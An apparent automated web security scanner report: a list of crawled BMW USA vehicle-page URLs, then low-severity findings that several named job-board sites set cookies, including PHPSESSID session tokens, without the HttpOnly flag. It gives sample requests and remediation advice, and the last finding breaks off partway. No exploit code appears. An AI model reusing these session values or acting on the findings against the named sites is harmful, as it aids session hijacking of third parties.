http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/3seriesconvertiblemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/3seriescoupemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/3seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/3seriessportswagonmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/3seriescoupemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/3seriessportswagonmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/3seriesconvertiblemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/3seriescoupemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/3seriesconvertiblemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/3seriescoupemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx%20%20
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/3seriescoupemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/3seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/3convertibleexplorenew.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/3coupeexplorenew.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/3sedanexplore.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/3/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/5seriesgranturismomediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/5seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/5seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/5seriesgranturismomediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/5seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/5seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/5/5explore.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/5granturismoexplore.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/5/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/7seriessedanmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/allnew7series.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/modelhighlightsrd.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/7/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/x3savexplore.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x5/x5savexplorenew.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/x5seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/x6explore.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/default.aspx%20
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4explore.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/features_and_specs.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/features_and_specs.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx
https://www.bmwusa.com/ScriptResource.axd
https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
https://www.bmwusa.com/Secured/FrameCheck.aspx
https://www.bmwusa.com/Secured/NaN
https://www.bmwusa.com/WebResource.axd
https://www.bmwusa.com/favicon.ico
https://www.bmwusa.com/jsenvconst.ashx
http://www.buyatoyota.com/NationalLanding.aspx
http://www.facebook.com/BMWUSA
http://www.facebook.com/EmploymentXing
http://www.facebook.com/pages/JD2B/298408284363
http://www.facebook.com/piyush.v.bhatt
http://www.facebook.com/profile.php
http://www.facebook.com/yahoonews
https://www.lowermybills.com/lending/home-refinance/
http://www.omniture.com/
http://www.toyotafinancial.com/consumer/tfs.portal
http://www.velaw.com/

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

10.1. http://www.100kcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.100kcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=4gi6e55n6c5ims48r8g0gv1692; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:12 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:12 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.100kcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.2. http://www.accountingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.accountingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=m8i6cd531h6rsd383n5t999356; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.accountingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.3. http://www.accountmanagementcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.accountmanagementcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=bvhhpa1stegtb9iluknr76tt84; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.accountmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.4. http://www.actuarialcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.actuarialcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=gfsjuvk6a0eja28o52r05s3445; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:22 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:22 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.actuarialcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.5. http://www.admincrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.admincrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=9hecq37ajcfirr9ve90dobkne6; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.admincrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.6. http://www.advertisingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.advertisingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=4vstlithvj0cev5m57soav4bi3; path=/
